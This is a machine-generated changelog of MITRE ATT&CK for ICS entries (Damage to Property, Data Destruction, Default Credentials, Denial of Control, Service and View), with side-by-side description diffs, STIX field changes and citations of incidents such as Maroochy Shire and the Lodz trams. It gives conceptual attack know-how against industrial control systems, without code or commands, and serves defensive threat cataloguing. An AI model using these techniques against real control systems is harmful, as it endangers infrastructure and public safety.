collisions, causing harm to those on board and the environment outside. (Citation: LodzTram-Schneier-2008-01)Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's now blackened rivers.(Citation: Marshall Abrams July 2008) The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0879https://attack.mitre.org/techniques/T0879
external_references[1]['source_name']Maroochy - MITRE - 200808Bruce Schneier January 2008
external_references[1]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17
external_references[1]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html
external_references[2]['source_name']LodzTram-LondonReconnections-2017-12BSI State of IT Security 2014
external_references[2]['description']John Bill. (2017, May 12). Hacked Cyber Security Railways. Retrieved October 17, 2019.Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30
external_references[2]['url']https://www.londonreconnections.com/2017/hacked-cyber-security-railways/https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3
external_references[3]['source_name']LodzTram-InHomelandSecurity-2008-02John Bill May 2017
external_references[3]['description']Shelley Smith. (2008, February 12). Teen Hacker in Poland Plays Trains and Derails City Tram System. Retrieved October 17, 2019.John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17
external_references[3]['url']https://inhomelandsecurity.com/teen%20hacker%20in%20poland%20plays%20tr/https://www.londonreconnections.com/2017/hacked-cyber-security-railways/
external_references[4]['source_name']LodzTram-Schneier-2008-01Marshall Abrams July 2008
external_references[4]['description']Bruce Schneier. (2008, January 17). Hacking Polish Trams. Retrieved October 17, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[4]['url']https://www.schneier.com/blog/archives/2008/01/hacking%20the%20pol.htmlhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[5]['source_name']German Steel Mill - German Federal Office for Information Security - 2014Shelley Smith February 2008
external_references[5]['description']Bundesamt für Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security). (2014). Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany). Retrieved October 30, 2019.Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[5]['url']https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?%20blob=publicationFile&v=3https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

[T0809] Data Destruction

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may perform data destruction over the course of t1Adversaries may perform data destruction over the course of 
>an operation. The adversary may drop or create malware, tool>an operation. The adversary may drop or create malware, tool
>s, or other non-native files on a target system to accomplis>s, or other non-native files on a target system to accomplis
>h this, potentially leaving behind traces of malicious activ>h this, potentially leaving behind traces of malicious activ
>ities. Such non-native files and other data may be removed o>ities. Such non-native files and other data may be removed o
>ver the course of an intrusion to maintain a small footprint>ver the course of an intrusion to maintain a small footprint
> or as a standard part of the post-intrusion cleanup process> or as a standard part of the post-intrusion cleanup process
>. (Citation: EAttack File Deletion)   Data destruction may a>. (Citation: Enterprise ATT&CK January 2018)  Data destructi
>lso be used to render operator interfaces unable to respond >on may also be used to render operator interfaces unable to 
>and to disrupt response functions from occurring as expected>respond and to disrupt response functions from occurring as 
>. An adversary may also destroy data backups that are vital >expected. An adversary may also destroy data backups that ar
>to recovery after an incident.  Standard file deletion comma>e vital to recovery after an incident.  Standard file deleti
>nds are available on most operating system and device interf>on commands are available on most operating system and devic
>aces to perform cleanup, but adversaries may use other tools>e interfaces to perform cleanup, but adversaries may use oth
> as well. Two examples are Windows Sysinternals SDelete and >er tools as well. Two examples are Windows Sysinternals SDel
>Active@ Killdisk.  Detection: It may be uncommon for events >ete and Active@ Killdisk.
>related to benign command-line functions such as DEL or thir 
>d-party utilities or tools to be found in an environment, de 
>pending on the user base and how systems are typically used. 
> Monitoring for command-line deletion functions to correlate 
> with binaries or other files that an adversary may drop and 
> remove may lead to detection of malicious activity. Another 
> good practice is monitoring for known deletion and secure d 
>eletion tools that are not already on systems within an ente 
>rprise network that an adversary could introduce. Some monit 
>oring tools may collect command-line arguments, but may not  
>capture DEL commands since DEL is a native function within c 
>md.exe. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 13:04:01.612000+00:002022-09-19 14:12:22.878000+00:00
descriptionAdversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: EAttack File Deletion) Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk. Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018) Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0809https://attack.mitre.org/techniques/T0809
external_references[1]['source_name']EAttack File DeletionEnterprise ATT&CK January 2018
external_references[1]['description']Enterprise ATT&CK. (2018, January 11). File Deletion. Retrieved May 17, 2018.Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17

[T0812] Default Credentials

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may leverage manufacturer or supplier set default1Adversaries may leverage manufacturer or supplier set defaul
>t credentials on control system devices. These default crede>t credentials on control system devices. These default crede
>ntials may have administrative permissions and may be necess>ntials may have administrative permissions and may be necess
>ary for initial configuration of the device. It is general b>ary for initial configuration of the device. It is general b
>est practice to change the passwords for these accounts as s>est practice to change the passwords for these accounts as s
>oon as possible, but some manufacturers may have devices tha>oon as possible, but some manufacturers may have devices tha
>t have passwords or usernames that cannot be changed. (Citat>t have passwords or usernames that cannot be changed. (Citat
>ion: Guidance - NIST SP800-82)  Default credentials are norm>ion: Keith Stouffer May 2015)  Default credentials are norma
>ally documented in an instruction manual that is either pack>lly documented in an instruction manual that is either packa
>aged with the device, published online through official mean>ged with the device, published online through official means
>s, or published online through unofficial means. Adversaries>, or published online through unofficial means. Adversaries 
> may leverage default credentials that have not been properl>may leverage default credentials that have not been properly
>y modified or disabled.> modified or disabled.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-19 14:07:23.199000+00:00
descriptionAdversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Guidance - NIST SP800-82) Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015) Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0812https://attack.mitre.org/techniques/T0812
external_references[1]['source_name']Guidance - NIST SP800-82Keith Stouffer May 2015
external_references[1]['description']Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28

[T0813] Denial of Control

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may cause a denial of control to temporarily pret1Adversaries may cause a denial of control to temporarily pre
>vent operators and engineers from interacting with process c>vent operators and engineers from interacting with process c
>ontrols. An adversary may attempt to deny process control ac>ontrols. An adversary may attempt to deny process control ac
>cess to cause a temporary loss of communication with the con>cess to cause a temporary loss of communication with the con
>trol device or to prevent operator adjustment of process con>trol device or to prevent operator adjustment of process con
>trols. An affected process may still be operating during the>trols. An affected process may still be operating during the
> period of control loss, but not necessarily in a desired st> period of control loss, but not necessarily in a desired st
>ate. (Citation: Reference - Corero) (Citation: Reference - S>ate. (Citation: Corero) (Citation: Michael J. Assante and Ro
>ANS - 201510) (Citation: Reference - RIoT)  In the Maroochy >bert M. Lee) (Citation: Tyson Macaulay)  In the Maroochy Shi
>attack, the adversary was able to temporarily shut an invest>re attack, the adversary temporarily shut an investigator ou
>igator out of the network preventing them from issuing any c>t of the network preventing them from issuing any controls.(
>ontrols. In the 2017 Dallas Siren incident operators were un>Citation: Marshall Abrams July 2008)  In the 2017 Dallas Sir
>able to disable the false alarms from the Office of Emergenc>en incident operators were unable to disable the false alarm
>y Management headquarters.>s from the Office of Emergency Management headquarters. (Cit
 >ation: Mark Loveless April 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
external_referenceshttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:29:26.506000+00:002022-10-20 18:09:55.792000+00:00
descriptionAdversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network preventing them from issuing any controls. In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters.Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T813https://attack.mitre.org/techniques/T0813
external_references[1]['source_name']Reference - CoreroCorero
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[2]['source_name']Reference - SANS - 201510Mark Loveless April 2017
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 2020/11/06
external_references[2]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://duo.com/decipher/the-dallas-county-siren-hack
external_references[3]['source_name']Reference - RIoTMarshall Abrams July 2008
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
x_mitre_platforms[0]WindowsNone
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Michael J. Assante and Robert M. Lee', 'description': 'Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ', 'url': 'https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297'}
external_references{'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'}

[T0814] Denial of Service

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may perform Denial-of-Service (DoS) attacks to dt1Adversaries may perform Denial-of-Service (DoS) attacks to d
>isrupt expected device functionality. Examples of DoS attack>isrupt expected device functionality. Examples of DoS attack
>s include overwhelming the target device with a high volume >s include overwhelming the target device with a high volume 
>of requests in a short time period and sending the target de>of requests in a short time period and sending the target de
>vice a request it does not know how to handle. Disrupting de>vice a request it does not know how to handle. Disrupting de
>vice state may temporarily render it unresponsive, possibly >vice state may temporarily render it unresponsive, possibly 
>lasting until a reboot can occur. When placed in this state,>lasting until a reboot can occur. When placed in this state,
> devices may be unable to send and receive requests, and may> devices may be unable to send and receive requests, and may
> not perform expected response functions in reaction to othe> not perform expected response functions in reaction to othe
>r events in the environment.  Some ICS devices are particula>r events in the environment.   Some ICS devices are particul
>rly sensitive to DoS events, and may become unresponsive in >arly sensitive to DoS events, and may become unresponsive in
>reaction to even a simple ping sweep. Adversaries may also a> reaction to even a simple ping sweep. Adversaries may also 
>ttempt to execute a Permanent Denial-of-Service (PDoS) again>attempt to execute a Permanent Denial-of-Service (PDoS) agai
>st certain devices, such as in the case of the BrickerBot ma>nst certain devices, such as in the case of the BrickerBot m
>lware. (Citation: BrickerBot - ICS-CERT - Alert)  Adversarie>alware. (Citation: ICS-CERT April 2017)   Adversaries may ex
>s may exploit a software vulnerability to cause a denial of >ploit a software vulnerability to cause a denial of service 
>service by taking advantage of a programming error in a prog>by taking advantage of a programming error in a program, ser
>ram, service, or within the operating system software or ker>vice, or within the operating system software or kernel itse
>nel itself to execute adversary-controlled code. Vulnerabili>lf to execute adversary-controlled code. Vulnerabilities may
>ties may exist in software that can be used to cause a  or d> exist in software that can be used to cause a denial of ser
>enial of service condition.  Adversaries may have prior know>vice condition.   Adversaries may have prior knowledge about
>ledge about industrial protocols or control devices used in > industrial protocols or control devices used in the environ
>the environment through <span class="smw-format list-format >ment through [Remote System Information Discovery](https://a
>"><span class="smw-row"><span class="smw-field"><span class=>ttack.mitre.org/techniques/T0888). There are examples of adv
>"smw-value">Control Device Identification</span></span></spa>ersaries remotely causing a [Device Restart/Shutdown](https:
>n></span>. There are examples of adversaries remotely causin>//attack.mitre.org/techniques/T0816) by exploiting a vulnera
>g a <span class="smw-format list-format "><span class="smw-r>bility that induces uncontrolled resource consumption. (Cita
>ow"><span class="smw-field"><span class="smw-value">Device R>tion: ICS-CERT August 2018) (Citation: Common Weakness Enume
>estart/Shutdown</span></span></span></span> by exploiting a >ration January 2019) (Citation: MITRE March 2018)   In the M
>vulnerability that induces uncontrolled resource consumption>aroochy Shire attack, the adversary shut an investigator out
>. (Citation: Industroyer - ICS-CERT ADV) (Citation: Industro> of the network.(Citation: Marshall Abrams July 2008)
>yer - CWE-400) (Citation: Industroyer - CVE-2015-5374)  In t 
>he Maroochy attack, the adversary was able to shut an invest 
>igator out of the network. (Citation: Maroochy - MITRE - 200 
>808) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:17:08.160000+00:00
descriptionAdversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: BrickerBot - ICS-CERT - Alert) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a or denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through Control Device Identification. There are examples of adversaries remotely causing a Device Restart/Shutdown by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: Industroyer - ICS-CERT ADV) (Citation: Industroyer - CWE-400) (Citation: Industroyer - CVE-2015-5374) In the Maroochy attack, the adversary was able to shut an investigator out of the network. (Citation: Maroochy - MITRE - 200808)Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) In the Maroochy Shire attack, the adversary shut an investigator out of the network.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0814https://attack.mitre.org/techniques/T0814
external_references[1]['source_name']BrickerBot - ICS-CERT - AlertCommon Weakness Enumeration January 2019
external_references[1]['description']ICS-CERT. (2017, April 18). CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack. Retrieved October 24, 2019.Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14
external_references[1]['url']https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01Ahttp://cwe.mitre.org/data/definitions/400.html
external_references[2]['source_name']Maroochy - MITRE - 200808ICS-CERT April 2017
external_references[2]['description']Marshall Abrams. (2008, July 23). Malicious Control System Cyber Security Attack Case Study– Maroochy Water Services, Australia. Retrieved March 27, 2018.ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24
external_references[2]['url']https://www.mitre.org/sites/default/files/pdf/08%201145.pdfhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A
external_references[3]['source_name']Industroyer - ICS-CERT ADVICS-CERT August 2018
external_references[3]['description']ICS-CERT. (2018, August 27). Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability. Retrieved March 14, 2019.ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14
external_references[4]['source_name']Industroyer - CWE-400Marshall Abrams July 2008
external_references[4]['description']Common Weakness Enumeration. (2019, January 03). CWE-400: Uncontrolled Resource Consumption. Retrieved March 14, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[4]['url']http://cwe.mitre.org/data/definitions/400.htmlhttps://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[5]['source_name']Industroyer - CVE-2015-5374MITRE March 2018
external_references[5]['description']MITRE. (2018, March 22). CVE-2015-5374. Retrieved March 14, 2019.MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14

[T0815] Denial of View

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may cause a denial of view in attempt to disruptt1Adversaries may cause a denial of view in attempt to disrupt
> and prevent operator oversight on the status of an ICS envi> and prevent operator oversight on the status of an ICS envi
>ronment. This may manifest itself as a temporary communicati>ronment. This may manifest itself as a temporary communicati
>on failure between a device and its control source, where th>on failure between a device and its control source, where th
>e interface recovers and becomes available once the interfer>e interface recovers and becomes available once the interfer
>ence ceases. (Citation: Reference - Corero) (Citation: Refer>ence ceases. (Citation: Corero) (Citation: Michael J. Assant
>ence - SANS - 201510) (Citation: Reference - RIoT)   An adve>e and Robert M. Lee) (Citation: Tyson Macaulay)   An adversa
>rsary may attempt to deny operator visibility by preventing >ry may attempt to deny operator visibility by preventing the
>them from receiving status and reporting messages. Denying t>m from receiving status and reporting messages. Denying this
>his view may temporarily block and prevent operators from no> view may temporarily block and prevent operators from notic
>ticing a change in state or anomalous behavior. The environm>ing a change in state or anomalous behavior. The environment
>ent's data and processes may still be operational, but funct>'s data and processes may still be operational, but function
>ioning in an unintended or adversarial manner.  In the Maroo>ing in an unintended or adversarial manner.   In the Marooch
>chy attack, the adversary was able to temporarily shut an in>y Shire attack, the adversary temporarily shut an investigat
>vestigator out of the network, preventing them from viewing >or out of the network, preventing them from viewing the stat
>the state of the system.>e of the system.(Citation: Marshall Abrams July 2008)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
external_referenceshttps://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002022-10-20 18:08:38.480000+00:00
descriptionAdversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network, preventing them from viewing the state of the system.Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0815https://attack.mitre.org/techniques/T0815
external_references[1]['source_name']Reference - CoreroCorero
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[2]['source_name']Reference - SANS - 201510Marshall Abrams July 2008
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[2]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
external_references[3]['source_name']Reference - RIoTMichael J. Assante and Robert M. Lee
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
iterable_item_added
STIX FieldOld valueNew Value
